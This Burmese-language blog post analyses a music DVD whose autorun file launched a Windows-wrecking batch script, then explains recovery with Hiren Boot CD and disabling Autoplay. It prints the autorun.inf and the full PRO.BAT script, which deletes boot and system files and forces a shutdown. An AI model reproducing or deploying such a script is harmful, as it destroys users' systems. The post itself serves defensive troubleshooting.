Virus မဟုတ်သော Windows ဖျက်စီးရေးပရိုဂရမ်များ
``လုပ်ပါဦးဗျာ ... အဲဒီ သီချင်းခွေထည့်လိုက်တာ ... စက်ပိတ် သွားပြီး ပြန်ဖွင့်တော့ Windows ပြန်တက် မလာတော့ဘူးဗျ´´ ဆိုပြီး အသိ တစ်ယောက် System Unit မလာပြီး ရောက်လာပါတယ်။ လက်ထဲမှာ လည်း DVD သီချင်းခွေလေး ပါလာပါတယ်။
``ကဲ ပေးစမ်းပါဦး...ခင်ဗျားခွေ´´ လို့ ပြောပြီး ...ခွေယူကာ ကျွန်တော့်ကွန်ပျူတာထဲ အရင်ထည့်ကြည့် လိုက်ပါတယ်။ ခွေထည့်လိုက် တာနဲ့ ဖြစ်သွားတာဆိုတော့ ခွေထဲမှာ Autorun File ပါလို့ပေါ့။ ဒါကြောင့် ကျွန်တော်လည်း Keyboard က Shift Key လေးဖိထားပြီး ခွေထည့်လိုက်ပါ တယ်။ DVD Drive မှ မီးလေးငြိမ်းသွားမှ Shift Key ကိုလွှတ်လိုက်ပါတယ်။
ခွေထဲမှာ ဘာတွေပါလည်း ကြည့်ကြည့်လိုက်ဦးမယ်။ My Computer ကို ဖွင့်လိုက်ပါတယ်။ DVD Drive ကို Explorer View နဲ့ ဖွင့်လိုက် ပါတယ်။ Double Click နဲ့ ဖွင့်လိုက်ရင် ကျွန်တော့်စက်လည်း Windows ပျက်သွားနိုင်တယ်လေ။ Autorun File ပွင့်မသွားအောင် Explorer နဲ့ ဖွင့်တာပါ။ သေချာတာပေါ့ ကျွန်တော်ထင်တဲ့အတိုင်းပဲ Autorun File တွေ့ ပါပြီဗျာ။ သီချင်း File တွေနဲ့အတူ ဖျက်ဆီးရေး File တွေ ပါလာပါတယ်။ ပါလာတဲ့ ဖျက်ဆီးရေးဖိုင်တွေကတော့ -
autorun.inf
EDCDPROT.ICO
PRO.BAT
PRO.EXE
VCD_PLAY.EXE
တို့ ဖြစ်ပါတယ်။
ပထမဆုံး autorun.inf ဖိုင်ကို Notepad နဲ့ ဖွင့်ကြည့်လိုက်ပါတယ်။ ဘယ်ဖိုင်တွေကို Run ထားတာလည်း ဆိုတာကို သိရအောင်ပါ။ ကဲ တွေ့ပါပြီဗျာ -
[Autorun]
ICON=EDCDPROT.ICO
OPEN=PRO.BAT
OPEN=PRO.EXE
OPEN=VCD_PLAY.exe
DVD ကို Icon လေးတောင် ထည့်ထားလိုက်သေးတယ်။ OPEN= PRO.BAT ဆိုတော့ PRO.BAT ကို အရင် Run တာပေါ့။ BAT ဖိုင်ဆိုတော့ Notepad နဲ့ ဖွင့်လို့ရသေးတယ်ဗျ။ ဖွင့်လိုက်ပါပြီဗျာ - ဟာဟ - ဟုတ်လှ ချည်လား။
@echo off
attrib -a -s -r -h
cls
del c:\io.sys
del c:\msdos.sys
cls
del c:\windows\win.com
del c:\windows\win.ini
del c:\windows\system.ini
cls
del c:\winnt\winnt.*
cls
del/f/q/a -h c:\ntdetect.com
del/f/q/a -h c:\boot.ini
cls
shutdown -s -t 00
သေချာပြီပေါ့။ ဘယ်လိုလုပ် Windows တက်နိုင်မှာလဲ။ ဖျက် ထားတဲ့ ဖိုင်တွေလည်း ကြည့်ဦးလေ။ User က စက်မပိတ်မှာကြောက်လို့။ နောက်ဆုံးစာကြောင်းမှာ Shutdown တောင် အပြီးလုပ်ပေး လိုက်သေး တယ်။ ကျန်တဲ့ဖိုင်တွေတောင် မလိုတော့ပါဘူးဗျာ။ ဒီ(၂)ဖိုင်နဲ့တင် Windows က တက်မှာ မဟုတ်တော့ဘူး။ ကျန်တဲ့ဖိုင်တွေကလည်း .EXE ဖိုင်တွေဆိုတော့။ ဖွင့်ကြည့်ဖို့ခဲယဉ်းတယ်လေ... ဒါကြောင့် ဖွင့်မနေ တော့ပါဘူး။ ဒီလောက်ဆို သဘောပေါက်သွားပြီ။
ကဲ...အဲဒီ Windows ကို ပြန်တက်လာအောင် ပြင်ကြည့်ရ အောင်။ လွယ်ပါတယ် သူဖျက်ထားတဲ့ ဖိုင်တွေကို တခြား Windows တူတဲ့ စက်ကနေ ပြန်ကူးပြီးတော့ထည့်ပေးလိုက်ပေါ့။ ဒါပေမယ့် မေးစရာ တော့ ရှိတယ်ဗျ။ Windows မတက်ပါဘူးဆိုမှ ဘယ်လိုလုပ်ကူးထည့်ရမှာလဲ၊ ဟုတ်တာပေါ့... ဘယ်လို ကူးထည့်ရမလဲဆိုတာ ကျွန်တော်ပြောပြမယ် လေ။ အဲဒီလို ကူးထည့်ဖို့အတွက် ကျွန်တော့်ရဲ့ လက်ကိုင် တုတ်ဖြစ်တဲ့ Hiren Boot CD 9.3 တော့ လိုတယ်ဗျ။ နောက်ပြီး Memory Stick (Data Traveller/Flash Drive) ကလေးတစ်ခုလည်း လိုတယ်ဗျ။
အဆင့်(၁) Windows တက်နေတဲ့စက်ထဲကနေ Memory Stick ထဲကို သူဖျက်လိုက်တဲ့ ဖိုင်တွေကို ကူးထည့်ပါ။ ဖိုင်တွေက System File တွေဆိုတော့ Super hidden နဲ့ ဖွက်ထားတာပါ။ အဲဒီဖိုင်တွေကို မြင်ရဖို့ အတွက် -
My Computer ကိုဖွင့်ပါ။ Drive C: ကိုဖွင့်ပါ။
Tools Menu မှ Folder Options ကို ရွေးပါ။
View Tab ကိုရွေးပါ။
Show hidden files and folders ကို ရွေးပါ။
Hide extens-ions for known file types နဲ့ Hideprotected operating system files (Recommended)
Check Box နှစ်ခုကို Uncheck လုပ်ပေးပါ။
Yes/No မေးပါလိမ့်မယ်။ Yes ကို ရွေးပေးပါ။
ပြီးလျှင် OK ကို နှိပ်ပါ။
ဒါဆိုရင် Drive C: အောက်မှာ ရှိတဲ့ Windows Operating System ဖိုင်တွေကို မြင်ရပါပြီ။ အဲဒီထဲက IO.SYS, MSDOS.SYS, boot.ini, NTDETCT.COM ဖိုင်တွေကို Memory Stick ထဲကို Copy ကူးထည့်ပါ။
နောက်ပြီး C:\Windows\ အောက်ထဲမှာရှိတဲ့ system.ini, win.ini ဖိုင်နှစ်ဖိုင်ကိုလည်း Memory Stick ထဲကို Copy ကူးထည့်လိုက်ပါ။ သူ့ PRO.BAT ဖိုင်ထဲမှာ ရေးထားတဲ့ Win.com ဖိုင်က နေရာမှား နေတာပါ။ တကယ်တမ်းရှိတာက C:\Windows\System32\ အောက်မှာပါ။ ဒါပေမယ့် လိုရမယ်ရ C:\Windows\System32\win.com ကိုလည်း ကူးထည့်ထား လိုက်ပါ။
အဆင့်(၂) Windows ပျက်နေတဲ့စက်ကို Hiren Boot CD ဖြင့် Boot တက်ခိုင်းပါ။
Windows XPE ကို ရွေး၍ CD ထဲမှ Mini Windows တက်ခိုင်းပါ။
Mini Windows တက်လာရင် ခုနက ကူးထည့်ထားတဲ့ ဖိုင်တွေပါတဲ့ Memory Stick ကို စက်ရဲ့ USB Port မှာတပ်လိုက်ပါ။
My Computer ကိုဖွင့်ပါ။ Memory Stick Drive Icon ကိုဖွင့်ပါ။
ခုနက ကူးလာတဲ့ဖိုင်တွေကိုရွေးပြီး သူ့နေရာနဲ့သူ လိုက်ပြီးထည့်ပါ။
ရှိပြီးသားဆိုရင်တော့ overwrite မလုပ်ပါနဲ့။
ဥပမာ - IO.SYS, MSDOS.SYS, boot.ini ဖိုင်တွေကို C: ထဲကို Copy ကူးထည့်ပါ။
System.ini နဲ့ win.ini ဖိုင်တွေကို C:\Windows အောက်ထဲ ကူးထည့်ပါ။
ပြီးရင် Memory Stick ကို ပြန်ဖြုတ်ပါ။ ဒါဆိုရင် ပြီးပါပြီ။
Hiren Boot CD ခွေကိုထုတ်ပြီး စက်ကို ပြန်ဖွင့်လိုက်ပါ။ ပုံမှန်အတိုင်း Windows ပြန်တက်လာ ပါလိမ့်မယ်။ ပြန်တက်မလာခဲ့ရင် Boot Partition မှားနေလို့ပါ။ ဒါဆိုရင် Hiren Boot CD နဲ့ Mini Windows ပြန်တက်ခိုင်းပါ။
ခုနက ကူးထည့်တဲ့ ဖိုင်တွေထဲမှာ Boot Partition သတ်မှတ်ပေးတဲ့ ဖိုင်က boot.ini ဖိုင်ပါ။ သူ့ကို ပြင်ဖို့အတွက် အဲဒီ boot.ini ဖိုင်ကို Notepad နဲ့ ဖွင့်လိုက်ပါ။
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional”
/ noexecute=optin /fastdetect
အထက်ပါအတိုင်း ပေါ်လာပါလိမ့်မယ်။ ဒါတွေကို ပြင်ဖို့အတွက် ကတော့ HardDisk နဲ့ Partition အကြောင်းတော့ နဲနဲသိဖို့လိုပါတယ်။
ကိုယ့်စက်ထဲမှာ HardDisk ကတစ်လုံးတည်းတပ်ထားရင်တော့ သိပ်မခက်ပါဘူး။
ဥပမာ - Hard Disk ကို Partition (၂)ပိုင်း ပိုင်းထားတယ် ဆိုပါတော့။ C: နဲ့ D: ပေါ့ဗျာ။
ဒါဆိုရင် C: ကို multi(0) disk(0) rdisk(0) partition(1) နဲ့
D: ကို multi(0) disk(0) rdisk(0) partition(2)လို့ သတ်မှတ်ပါတယ်။
(၃)ပိုင်း ပိုင်းထားရင် partition(3)ပေါ့ဗျာ။ ကိုယ်က ဘယ် partition ထဲမှာ Windows တင်ထားသလဲ ဆိုတာတော့ သိဖို့လိုပါတယ်။ များသော အားဖြင့် စက်တော်တော်များများကတော့ Hard Disk ကို Partition (၂)ပိုင်း ပိုင်းထားတတ်ကြပါတယ်။ ပြီးရင် Windows ကိုလည်း C: ထဲမှာ တင်တာ များပါ တယ်။ အဲဒီစက်များအတွက် boot.ini မှာ အောက်ပါအတိုင်း ဖြစ်ရ ပါမယ်။
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional”
/ noexecute=optin /fastdetect
ဒါဆိုရင် Boot Partition လည်း မှန်သွားပြီဆိုတော့ Windows တက်ပြီပေါ့။
ပြီးရင် နောက်တစ်ကြိမ် အဲဒီ သီချင်းခွေထည့်မိရင် Windows ပျက် မသွားအောင်ကာကွယ် ထားကြည့်ရ အောင်။ သူက autorun.inf နဲ့ အလုပ် လုပ်တာဆိုတော့ ထည့်သမျှ ခွေနဲ့ တပ်သမျှ USB Device တွေကို Group Policy ထဲ၀င်ပြီး Autorun ပိတ်ထားလိုက်ရင်ရပါပြီ။
အဲ - တစ်ခုတော့ သတိထားဗျ။ ခွေကတော့ Autorun မတက်ပါ ဘူး။ ကိုယ်ကိုယ်တိုင် My Computer ထဲ၀င်ပြီး ခွေကို Double Click နှိပ် လိုက်လို့ကတော့ ကိုယ့်ခေါင်းကိုယ် တူနဲ့ထုတာပဲ။ ဘာထူးလို့လဲ ဘယ် Drive မဆို Double Click နှိပ်လို့ကတော့ အဲဒီ Drive ထဲမှာ Autorun ဖိုင် ပါလို့ကတော့ ထပြီး Run မှာပဲလေ။ ဒါလေးတော့ သတိထားပါ။
ဒါကြောင့် Virus ကိုက်တာမခံရချင်ရင် တွေ့ကရာကို Double Click မနှိပ်ပါနဲ့။ မိမိ Folder တွေ၊ Drive တွေကိုလည်း Double Click မနှိပ်ပါနဲ့ Right Click နှိပ်ပြီး Explorer နဲ့ဖွင့်ပါ။ မိမိကိုယ်ကိုယ်မိမိ ကျန်းမာရေးကောင်း အောင် ဆင်ဆင်ခြင်ခြင် နေထိုင်သလိုပေါ့ဗျာ။ တွေ့ကရာ လျှောက်စားနေ မယ်ဆိုရင် အနည်းဆုံးတော့ ၀မ်းပျက်သလိုပေါ့။ ဒါလေးတွေကို ဆင်ခြင် လိုက်ရင် Virus ကိုက်ခံရတာ မရှိသလောက် နည်းသွားပါလိမ့်မယ်။
အဆင့်(၃) Autorun ပိတ်ကြည့်ရအောင်။ Run Box ကိုဖွင့်ပါ။ gpedit.msc ဟု ရိုက် ထည့်ပြီး Enter နှိပ်ပါ။
Group Policy Window ပေါ်လာပါလိမ့်မယ်။ အဲဒီထဲမှ Administrative Templates ကိုဖွင့်ပါ။ System ကို ဆက်ဖွင့်ပါ။ ညာဘက် Setting List ထဲမှ Turn off Autoplay ကို Double Click နှိပ်ပါ။ ပေါ်လာ သော Box ထဲမှ Enable ကိုရွေးပါ။ Turn off Autoplay on: Drop Down List Box ထဲမှ All Drives ကိုရွေးပြီး OK ကိုနှိပ်ပါ။ Group Policy ထဲမှ ထွက်လိုက်ပါ။ ဒါဆိုရင် Autorun ဖိုင် ပါတဲ့ မည်သည့်ခွေ မည်သည့် Drive ကိုမဆို Auto Run မပေးတော့ပါဘူး။
နောက်တစ်နည်းက CPE17 Autorun Killer Program တင်ထားရင် လည်း ရပါတယ်။ ကာကွယ်နည်း လည်း ပြီးသွားပါပြီ။ Windows လည်း ပြန်မတင် ရတော့ဘူးပေါ့ဗျာ။